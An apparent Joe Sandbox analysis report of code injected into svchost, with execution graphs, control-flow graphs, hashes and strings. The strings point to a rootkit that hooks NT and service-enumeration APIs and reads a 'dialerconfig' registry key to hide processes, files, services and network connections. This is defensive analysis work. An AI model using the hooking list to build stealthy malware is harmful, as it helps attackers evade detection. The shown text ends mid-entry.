                                            execution_graph 14031 25306e61c28 14036 25306e61650 GetProcessHeap HeapAlloc 14031->14036 14033 25306e61c3e Sleep SleepEx 14034 25306e61c37 14033->14034 14034->14033 14035 25306e615c0 StrCmpIW StrCmpW 14034->14035 14035->14034 14080 25306e61274 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14036->14080 14038 25306e61678 14081 25306e61274 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14038->14081 14040 25306e61689 14082 25306e61274 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14040->14082 14042 25306e61692 14083 25306e61274 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14042->14083 14044 25306e6169b 14045 25306e616b6 RegOpenKeyExW 14044->14045 14046 25306e616e8 RegOpenKeyExW 14045->14046 14047 25306e618ce 14045->14047 14048 25306e61727 RegOpenKeyExW 14046->14048 14049 25306e61711 14046->14049 14047->14034 14051 25306e61762 RegOpenKeyExW 14048->14051 14052 25306e6174b 14048->14052 14084 25306e612c8 RegQueryInfoKeyW 14049->14084 14055 25306e61786 14051->14055 14056 25306e6179d RegOpenKeyExW 14051->14056 14094 25306e6104c RegQueryInfoKeyW 14052->14094 14060 25306e612c8 16 API calls 14055->14060 14057 25306e617d8 RegOpenKeyExW 14056->14057 14058 25306e617c1 14056->14058 14063 25306e61813 RegOpenKeyExW 14057->14063 14064 25306e617fc 14057->14064 14062 25306e612c8 16 API calls 14058->14062 14061 25306e61793 RegCloseKey 14060->14061 14061->14056 14065 25306e617ce RegCloseKey 14062->14065 14067 25306e61837 14063->14067 14068 25306e6184e RegOpenKeyExW 14063->14068 14066 25306e612c8 16 API calls 14064->14066 14065->14057 14069 25306e61809 RegCloseKey 14066->14069 14070 25306e6104c 6 API calls 14067->14070 14071 25306e61889 RegOpenKeyExW 14068->14071 14072 25306e61872 14068->14072 14069->14063 14075 25306e61844 RegCloseKey 14070->14075 14073 25306e618c4 RegCloseKey 14071->14073 14074 25306e618ad 14071->14074 14076 25306e6104c 6 API calls 14072->14076 14073->14047 14078 25306e6104c 6 API calls 14074->14078 14075->14068 14077 25306e6187f RegCloseKey 14076->14077 14077->14071 14079 25306e618ba RegCloseKey 14078->14079 14079->14073 14080->14038 14081->14040 14082->14042 14083->14044 14085 25306e61499 RegCloseKey 14084->14085 14086 25306e61334 GetProcessHeap HeapAlloc 14084->14086 14085->14048 14087 25306e61485 GetProcessHeap HeapFree 14086->14087 14088 25306e6135d RegEnumValueW 14086->14088 14087->14085 14092 25306e613af 14088->14092 14090 25306e6142f lstrlenW GetProcessHeap HeapAlloc StrCpyW 14090->14092 14091 25306e613dd GetProcessHeap HeapAlloc 14091->14092 14092->14087 14092->14088 14092->14090 14092->14091 14093 25306e61413 GetProcessHeap HeapFree 14092->14093 14101 25306e61554 14092->14101 14093->14090 14095 25306e611b5 RegCloseKey 14094->14095 14097 25306e610b9 14094->14097 14095->14051 14096 25306e610c7 RegEnumValueW 14096->14097 14097->14095 14097->14096 14098 25306e61149 GetProcessHeap HeapAlloc 14097->14098 14106 25306e6196c 14098->14106 14102 25306e615a4 14101->14102 14103 25306e6156e 14101->14103 14102->14092 14103->14102 14104 25306e61585 StrCmpIW 14103->14104 14105 25306e6158d StrCmpW 14103->14105 14104->14103 14105->14103 14107 25306e6117f GetProcessHeap HeapFree 14106->14107 14107->14097 14108 253067d2908 14110 253067d2936 14108->14110 14109 253067d2a2b LoadLibraryA 14109->14110 14110->14109 14111 253067d2aa7 14110->14111

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2972358053.0000025306E60000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025306E60000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_25306e60000_svchost.jbxd
                                            Similarity
                                            • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                            • String ID: d
                                            • API String ID: 3743429067-2564639436
                                            • Opcode ID: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
                                            • Instruction ID: 3eb227a90dd505873f50682121a590a1dd474164894a6c42467e29c58437e9ca
                                            • Opcode Fuzzy Hash: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
                                            • Instruction Fuzzy Hash: A6417233214B90D7E761CF95E94879AB7A1F3887C5F008125EB8907B98DF38D268CB04

                                            Control-flow Graph

                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2972358053.0000025306E60000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025306E60000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_25306e60000_svchost.jbxd
                                            Similarity
                                            • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                            • String ID:
                                            • API String ID: 1683269324-0
                                            • Opcode ID: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
                                            • Instruction ID: b4f454186f7518bad22eb1b959e946b12c2d53c60afc66e4c5c4ed66010226e7
                                            • Opcode Fuzzy Hash: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
                                            • Instruction Fuzzy Hash: 81117C34610F6181F761D7A1AF0E39A6690B7943C7F443029A9168B1DCEF7AC245C208

                                            Control-flow Graph

                                            APIs
                                              • Part of subcall function 0000025306E61650: GetProcessHeap.KERNEL32 ref: 0000025306E6165B
                                              • Part of subcall function 0000025306E61650: HeapAlloc.KERNEL32 ref: 0000025306E6166A
                                              • Part of subcall function 0000025306E61650: RegOpenKeyExW.ADVAPI32 ref: 0000025306E616DA
                                              • Part of subcall function 0000025306E61650: RegOpenKeyExW.ADVAPI32 ref: 0000025306E61707
                                              • Part of subcall function 0000025306E61650: RegCloseKey.ADVAPI32 ref: 0000025306E61721
                                              • Part of subcall function 0000025306E61650: RegOpenKeyExW.ADVAPI32 ref: 0000025306E61741
                                              • Part of subcall function 0000025306E61650: RegCloseKey.ADVAPI32 ref: 0000025306E6175C
                                              • Part of subcall function 0000025306E61650: RegOpenKeyExW.ADVAPI32 ref: 0000025306E6177C
                                              • Part of subcall function 0000025306E61650: RegCloseKey.ADVAPI32 ref: 0000025306E61797
                                              • Part of subcall function 0000025306E61650: RegOpenKeyExW.ADVAPI32 ref: 0000025306E617B7
                                              • Part of subcall function 0000025306E61650: RegCloseKey.ADVAPI32 ref: 0000025306E617D2
                                              • Part of subcall function 0000025306E61650: RegOpenKeyExW.ADVAPI32 ref: 0000025306E617F2
                                            • Sleep.KERNEL32 ref: 0000025306E61C43
                                            • SleepEx.KERNELBASE ref: 0000025306E61C49
                                              • Part of subcall function 0000025306E61650: RegCloseKey.ADVAPI32 ref: 0000025306E6180D
                                              • Part of subcall function 0000025306E61650: RegOpenKeyExW.ADVAPI32 ref: 0000025306E6182D
                                              • Part of subcall function 0000025306E61650: RegCloseKey.ADVAPI32 ref: 0000025306E61848
                                              • Part of subcall function 0000025306E61650: RegOpenKeyExW.ADVAPI32 ref: 0000025306E61868
                                              • Part of subcall function 0000025306E61650: RegCloseKey.ADVAPI32 ref: 0000025306E61883
                                              • Part of subcall function 0000025306E61650: RegOpenKeyExW.ADVAPI32 ref: 0000025306E618A3
                                              • Part of subcall function 0000025306E61650: RegCloseKey.ADVAPI32 ref: 0000025306E618BE
                                              • Part of subcall function 0000025306E61650: RegCloseKey.ADVAPI32 ref: 0000025306E618C8
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2972358053.0000025306E60000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025306E60000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_25306e60000_svchost.jbxd
                                            Similarity
                                            • API ID: CloseOpen$HeapSleep$AllocProcess
                                            • String ID:
                                            • API String ID: 1534210851-0
                                            • Opcode ID: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
                                            • Instruction ID: c96dbdf56c7b06dc75e875730af0182cb125b9de197d4399fdb0d2334372bebe
                                            • Opcode Fuzzy Hash: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
                                            • Instruction Fuzzy Hash: AB31F175200F2191FB52DFBAEF4939E12A4AB44BC7F047425AE09C76DEEE34CA50C658

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 72 25306e63930-25306e6393b 73 25306e63955-25306e6395c 72->73 74 25306e6393d-25306e63950 StrCmpNIW 72->74 74->73 75 25306e63952 74->75 75->73
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2972358053.0000025306E60000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025306E60000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_25306e60000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: dialer
                                            • API String ID: 0-3528709123
                                            • Opcode ID: 949ed436222ef7ba0644b0ca804308ca47b9c81469ce6be8bad6d29646da7b56
                                            • Instruction ID: d1cd3ae0d87e9f1448effe114ad9020b15a3ec25e0177666e4fb2723d12cce83
                                            • Opcode Fuzzy Hash: 949ed436222ef7ba0644b0ca804308ca47b9c81469ce6be8bad6d29646da7b56
                                            • Instruction Fuzzy Hash: B2D05E24311B5B86EB64DFE59D892652350AB047DAF44B1208A010319DDB289A8DCB18

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 76 253067d2908-253067d2973 call 253067d0f34 * 4 85 253067d2b8b 76->85 86 253067d2979-253067d297c 76->86 87 253067d2b8d-253067d2ba9 85->87 86->85 88 253067d2982-253067d2985 86->88 88->85 89 253067d298b-253067d298e 88->89 89->85 90 253067d2994-253067d29b2 89->90 90->85 92 253067d29b8-253067d29dc call 253067d0d6c 90->92 95 253067d2a0b-253067d2a12 92->95 96 253067d29de-253067d2a09 call 253067d0d6c 92->96 98 253067d2ab2-253067d2ab9 95->98 99 253067d2a18-253067d2a25 95->99 96->95 100 253067d2abf-253067d2ad6 98->100 101 253067d2b6c-253067d2b89 98->101 99->98 103 253067d2a2b-253067d2a39 LoadLibraryA 99->103 100->101 104 253067d2adc 100->104 101->87 105 253067d2a3b-253067d2a45 103->105 106 253067d2a9d-253067d2aa5 103->106 107 253067d2ae2-253067d2af7 104->107 108 253067d2a48-253067d2a4c 105->108 106->103 109 253067d2aa7-253067d2aac 106->109 111 253067d2b5b-253067d2b66 107->111 112 253067d2af9-253067d2b0a 107->112 113 253067d2a4e-253067d2a52 108->113 114 253067d2a9a 108->114 109->98 111->101 111->107 116 253067d2b0c-253067d2b13 112->116 117 253067d2b15-253067d2b19 112->117 118 253067d2a7d-253067d2a87 113->118 119 253067d2a54-253067d2a7b 113->119 114->106 120 253067d2b48-253067d2b59 116->120 121 253067d2b1b-253067d2b22 117->121 122 253067d2b24-253067d2b28 117->122 123 253067d2a8d-253067d2a98 118->123 119->123 120->111 120->112 121->120 124 253067d2b3a-253067d2b3e 122->124 125 253067d2b2a-253067d2b38 122->125 123->108 124->120 126 253067d2b40-253067d2b43 124->126 125->120 126->120
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2959207826.00000253067D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000253067D0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_253067d0000_svchost.jbxd
                                            Similarity
                                            • API ID: LibraryLoad
                                            • String ID:
                                            • API String ID: 1029625771-0
                                            • Opcode ID: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
                                            • Instruction ID: c1b1a8673df87b556c8a500f35a566ad28f2268a4018f20ed08d70a0e42731f4
                                            • Opcode Fuzzy Hash: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
                                            • Instruction Fuzzy Hash: 28610222301B6087EA68CF159848778B3A1FB44FD5F549825DF29877CBEA38DA53C708

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 222 25306e62cdc-25306e62d55 call 25306e7ecc0 225 25306e63090-25306e630b3 222->225 226 25306e62d5b-25306e62d61 222->226 226->225 227 25306e62d67-25306e62d6a 226->227 227->225 228 25306e62d70-25306e62d73 227->228 228->225 229 25306e62d79-25306e62d89 GetModuleHandleA 228->229 230 25306e62d9d 229->230 231 25306e62d8b-25306e62d9b call 25306e73090 229->231 233 25306e62da0-25306e62dbe 230->233 231->233 233->225 236 25306e62dc4-25306e62de3 StrCmpNIW 233->236 236->225 237 25306e62de9-25306e62ded 236->237 237->225 238 25306e62df3-25306e62dfd 237->238 238->225 239 25306e62e03-25306e62e0a 238->239 239->225 240 25306e62e10-25306e62e23 239->240 241 25306e62e25-25306e62e31 240->241 242 25306e62e33 240->242 243 25306e62e36-25306e62e3a 241->243 242->243 244 25306e62e4a 243->244 245 25306e62e3c-25306e62e48 243->245 246 25306e62e4d-25306e62e57 244->246 245->246 247 25306e62f4d-25306e62f51 246->247 248 25306e62e5d-25306e62e60 246->248 249 25306e62f57-25306e62f5a 247->249 250 25306e63082-25306e6308a 247->250 251 25306e62e72-25306e62e7c 248->251 252 25306e62e62-25306e62e6f call 25306e61a14 248->252 255 25306e62f6b-25306e62f75 249->255 256 25306e62f5c-25306e62f68 call 25306e61a14 249->256 250->225 250->240 253 25306e62eb0-25306e62eba 251->253 254 25306e62e7e-25306e62e8b 251->254 252->251 259 25306e62eea-25306e62eed 253->259 260 25306e62ebc-25306e62ec9 253->260 254->253 258 25306e62e8d-25306e62e9a 254->258 262 25306e62f77-25306e62f84 255->262 263 25306e62fa5-25306e62fa8 255->263 256->255 267 25306e62e9d-25306e62ea3 258->267 269 25306e62eef-25306e62ef9 call 25306e61d28 259->269 270 25306e62efb-25306e62f08 lstrlenW 259->270 260->259 268 25306e62ecb-25306e62ed8 260->268 262->263 272 25306e62f86-25306e62f93 262->272 265 25306e62faa-25306e62fb3 call 25306e61d28 263->265 266 25306e62fb5-25306e62fc2 lstrlenW 263->266 265->266 291 25306e62ffa-25306e63005 265->291 276 25306e62fe5-25306e62fef call 25306e63930 266->276 277 25306e62fc4-25306e62fce 266->277 274 25306e62ea9-25306e62eae 267->274 275 25306e62f43-25306e62f48 267->275 278 25306e62edb-25306e62ee1 268->278 269->270 269->275 280 25306e62f0a-25306e62f14 270->280 281 25306e62f2b-25306e62f3d call 25306e63930 270->281 282 25306e62f96-25306e62f9c 272->282 274->253 274->267 285 25306e62ff2-25306e62ff4 275->285 276->285 277->276 286 25306e62fd0-25306e62fe3 call 25306e61554 277->286 278->275 287 25306e62ee3-25306e62ee8 278->287 280->281 290 25306e62f16-25306e62f29 call 25306e61554 280->290 281->275 281->285 282->291 292 25306e62f9e-25306e62fa3 282->292 285->250 285->291 286->276 286->291 287->259 287->278 290->275 290->281 297 25306e63007-25306e6300b 291->297 298 25306e6307c-25306e63080 291->298 292->263 292->282 301 25306e63013-25306e6302d call 25306e686a0 297->301 302 25306e6300d-25306e63011 297->302 298->250 303 25306e63030-25306e63033 301->303 302->301 302->303 306 25306e63035-25306e63053 call 25306e686a0 303->306 307 25306e63056-25306e63059 303->307 306->307 307->298 309 25306e6305b-25306e63079 call 25306e686a0 307->309 309->298
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2972358053.0000025306E60000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025306E60000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_25306e60000_svchost.jbxd
                                            Similarity
                                            • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                            • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                            • API String ID: 2119608203-3850299575
                                            • Opcode ID: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
                                            • Instruction ID: 3515bfe7e7b7ab6fad81b4b4882aab1bc66bcefd9e350348560311820e22c634
                                            • Opcode Fuzzy Hash: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
                                            • Instruction Fuzzy Hash: 4AB19E32210FA085EBA5CFA5CA4879963A5F744BC6F547026FE09577D8EB35CB44C348

                                            Control-flow Graph

                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2972358053.0000025306E60000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025306E60000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_25306e60000_svchost.jbxd
                                            Similarity
                                            • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                            • String ID:
                                            • API String ID: 3140674995-0
                                            • Opcode ID: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
                                            • Instruction ID: 3860ca3a9ccc4f61de5fab1c6314edb5ee6f2e5bc74b540e0860344737e3c341
                                            • Opcode Fuzzy Hash: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
                                            • Instruction Fuzzy Hash: 98315D72204F9096EB60CFA0E8447EE73A4F784789F44542ADA4D47B99EF38C648C714
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2972358053.0000025306E60000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025306E60000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_25306e60000_svchost.jbxd
                                            Similarity
                                            • API ID: ErrorFileLastWrite$ConsoleOutput
                                            • String ID:
                                            • API String ID: 1443284424-0
                                            • Opcode ID: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
                                            • Instruction ID: 6e2a37bc13749d6f93b8863db0506f35e17443190fa809c6a389f22584975dec
                                            • Opcode Fuzzy Hash: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
                                            • Instruction Fuzzy Hash: CDE121B2714BA09AE700CFA4DA882DE7BB1F3457C9F106116EE4A57BDDDA34C61AC704

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2972358053.0000025306E60000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025306E60000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_25306e60000_svchost.jbxd
                                            Similarity
                                            • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                            • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                            • API String ID: 106492572-2879589442
                                            • Opcode ID: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
                                            • Instruction ID: 1ca94f53232ef8e48d711fb1114ee597262955cfd922d9b6dab6240cd3b83986
                                            • Opcode Fuzzy Hash: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
                                            • Instruction Fuzzy Hash: 44710936310F6085EB50DFA9ED5869E27A5F785BCAF002121EA4D47AACEF38C644D308

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2972358053.0000025306E60000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025306E60000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_25306e60000_svchost.jbxd
                                            Similarity
                                            • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                            • String ID: d
                                            • API String ID: 2005889112-2564639436
                                            • Opcode ID: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
                                            • Instruction ID: ea4cb44b8d4bc1762c3c9b222dcaff4fb0d6d3fdd8569e23f7a8df9a4e3e2995
                                            • Opcode Fuzzy Hash: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
                                            • Instruction Fuzzy Hash: D6519E72204F94D3EB54CFA6EA4839AB7A1F788BC5F049124DB4907B98DF38C25AC704

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2972358053.0000025306E60000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025306E60000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_25306e60000_svchost.jbxd
                                            Similarity
                                            • API ID: CurrentThread$AddressHandleModuleProc
                                            • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                            • API String ID: 4175298099-1975688563
                                            • Opcode ID: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
                                            • Instruction ID: f8434084b60d2490b86668ea946a91a06060f361aa750efe63ceeef58b7f8a35
                                            • Opcode Fuzzy Hash: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
                                            • Instruction Fuzzy Hash: 9831A274210F6AA4FA04EFE8EF596D92721B7543C7F807423A6191B1ED9E39835DC388

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2972358053.0000025306E60000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025306E60000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_25306e60000_svchost.jbxd
                                            Similarity
                                            • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                            • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                            • API String ID: 2171963597-1373409510
                                            • Opcode ID: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
                                            • Instruction ID: 4b9723d83ffef661a2df1093bac8626c59532c343e3a3266cd6f49c48f56047a
                                            • Opcode Fuzzy Hash: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
                                            • Instruction Fuzzy Hash: 0A214936614B5083FB10CB65EA4835A77A0F389BE6F505215EA5943BECDF7CC249CB04

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 429 25306e675f0-25306e675f6 430 25306e675f8-25306e675fb 429->430 431 25306e67631-25306e6763b 429->431 432 25306e67625-25306e67664 call 25306e67ca0 430->432 433 25306e675fd-25306e67600 430->433 434 25306e67758-25306e6776d 431->434 452 25306e6766a-25306e6767f call 25306e67b34 432->452 453 25306e67732 432->453 435 25306e67618 __scrt_dllmain_crt_thread_attach 433->435 436 25306e67602-25306e67605 433->436 437 25306e6776f 434->437 438 25306e6777c-25306e67796 call 25306e67b34 434->438 444 25306e6761d-25306e67624 435->444 440 25306e67607-25306e67610 436->440 441 25306e67611-25306e67616 call 25306e67be4 436->441 442 25306e67771-25306e6777b 437->442 450 25306e67798-25306e677cd call 25306e67c5c call 25306e67afc call 25306e67ff8 call 25306e67e10 call 25306e67e34 call 25306e67c8c 438->450 451 25306e677cf-25306e67800 call 25306e67e70 438->451 441->444 450->442 463 25306e67811-25306e67817 451->463 464 25306e67802-25306e67808 451->464 461 25306e6774a-25306e67757 call 25306e67e70 452->461 462 25306e67685-25306e67696 call 25306e67ba4 452->462 457 25306e67734-25306e67749 453->457 461->434 479 25306e676e7-25306e676f1 call 25306e67e10 462->479 480 25306e67698-25306e676bc call 25306e67fbc call 25306e67aec call 25306e67b18 call 25306e69cdc 462->480 469 25306e67819-25306e67823 463->469 470 25306e6785e-25306e67874 call 25306e63458 463->470 464->463 468 25306e6780a-25306e6780c 464->468 475 25306e678ff-25306e6790c 468->475 476 25306e67825-25306e6782d 469->476 477 25306e6782f-25306e6783d call 25306e73358 469->477 490 25306e67876-25306e67878 470->490 491 25306e678ac-25306e678ae 470->491 482 25306e67843-25306e67858 call 25306e675f0 476->482 477->482 494 25306e678f5-25306e678fd 477->494 479->453 502 25306e676f3-25306e676ff call 25306e67e60 479->502 480->479 532 25306e676be-25306e676c5 __scrt_dllmain_after_initialize_c 480->532 482->470 482->494 490->491 499 25306e6787a-25306e6789c call 25306e63458 call 25306e67758 490->499 492 25306e678b5-25306e678ca call 25306e675f0 491->492 493 25306e678b0-25306e678b3 491->493 492->494 511 25306e678cc-25306e678d6 492->511 493->492 493->494 494->475 499->491 526 25306e6789e-25306e678a6 call 25306e73358 499->526 519 25306e67725-25306e67730 502->519 520 25306e67701-25306e6770b call 25306e67d78 502->520 516 25306e678d8-25306e678df 511->516 517 25306e678e1-25306e678f1 call 25306e73358 511->517 516->494 517->494 519->457 520->519 531 25306e6770d-25306e6771b 520->531 526->491 531->519 532->479 533 25306e676c7-25306e676e4 call 25306e69c78 532->533 533->479
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2972358053.0000025306E60000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025306E60000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_25306e60000_svchost.jbxd
                                            Similarity
                                            • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                            • String ID:
                                            • API String ID: 190073905-0
                                            • Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                            • Instruction ID: 46a3f7955dd0718d26c4c5b575450434584877d29b7e551ed17222307919b4d6
                                            • Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                            • Instruction Fuzzy Hash: 8B81CD30710F7186FE50EBE99E4C39A2290AB457CAF047125BA09477EEDB38CB41C708

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 536 25306e69804-25306e69842 537 25306e69848-25306e6984b 536->537 538 25306e69933 536->538 539 25306e69935-25306e69951 537->539 540 25306e69851 537->540 538->539 541 25306e69854 540->541 542 25306e6985a-25306e69869 541->542 543 25306e6992b 541->543 544 25306e69876-25306e69895 LoadLibraryExW 542->544 545 25306e6986b-25306e6986e 542->545 543->538 548 25306e69897-25306e698a0 call 25306e73080 544->548 549 25306e698ed-25306e69902 544->549 546 25306e69874 545->546 547 25306e6990d-25306e6991c call 25306e73090 545->547 551 25306e698e1-25306e698e8 546->551 547->543 556 25306e6991e-25306e69929 547->556 557 25306e698a2-25306e698b7 call 25306e6ad28 548->557 558 25306e698cf-25306e698d9 548->558 549->547 553 25306e69904-25306e69907 FreeLibrary 549->553 551->541 553->547 556->539 557->558 561 25306e698b9-25306e698cd LoadLibraryExW 557->561 558->551 561->549 561->558
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2972358053.0000025306E60000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025306E60000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_25306e60000_svchost.jbxd
                                            Similarity
                                            • API ID: Library$Load$AddressErrorFreeLastProc
                                            • String ID: api-ms-
                                            • API String ID: 2559590344-2084034818
                                            • Opcode ID: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
                                            • Instruction ID: 702610bec8e7a65bbd8d4d06c48433f054525fb93bb0180a477ced8a9b809bb6
                                            • Opcode Fuzzy Hash: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
                                            • Instruction Fuzzy Hash: 3D310331202F6195EE51DF92AE087996394BB08BE6F092525FD2D4B3D9EF38C244C308

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2972358053.0000025306E60000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025306E60000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_25306e60000_svchost.jbxd
                                            Similarity
                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                            • String ID: CONOUT$
                                            • API String ID: 3230265001-3130406586
                                            • Opcode ID: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
                                            • Instruction ID: b58e3b165d099d1b7975f85f89b3e99003cf41f4ba852fc3f395b3dab0e66951
                                            • Opcode Fuzzy Hash: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
                                            • Instruction Fuzzy Hash: FC116D21314F6086E790CB96ED5831A77A0FB98FE6F145224EA5D877D8DF78CA04C748
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2972358053.0000025306E60000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025306E60000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_25306e60000_svchost.jbxd
                                            Similarity
                                            • API ID: Thread$Current$Context
                                            • String ID:
                                            • API String ID: 1666949209-0
                                            • Opcode ID: 52f3b0a83a9fc5b22f41d8404852d8b34c9dcd72dd37eace61d9b8d2680426a2
                                            • Instruction ID: aaf0407f03c20954f3603b35a4714f407628f89e6976bb78a0326656dfb50811
                                            • Opcode Fuzzy Hash: 52f3b0a83a9fc5b22f41d8404852d8b34c9dcd72dd37eace61d9b8d2680426a2
                                            • Instruction Fuzzy Hash: 45D18C76208F9881DA70DB59E99835A77A0F7C8BC9F105216EA8D47BE9DF38C641CB04
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2972358053.0000025306E60000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025306E60000, based on PE: true
                                            Joe Sandbox IDA Plugin
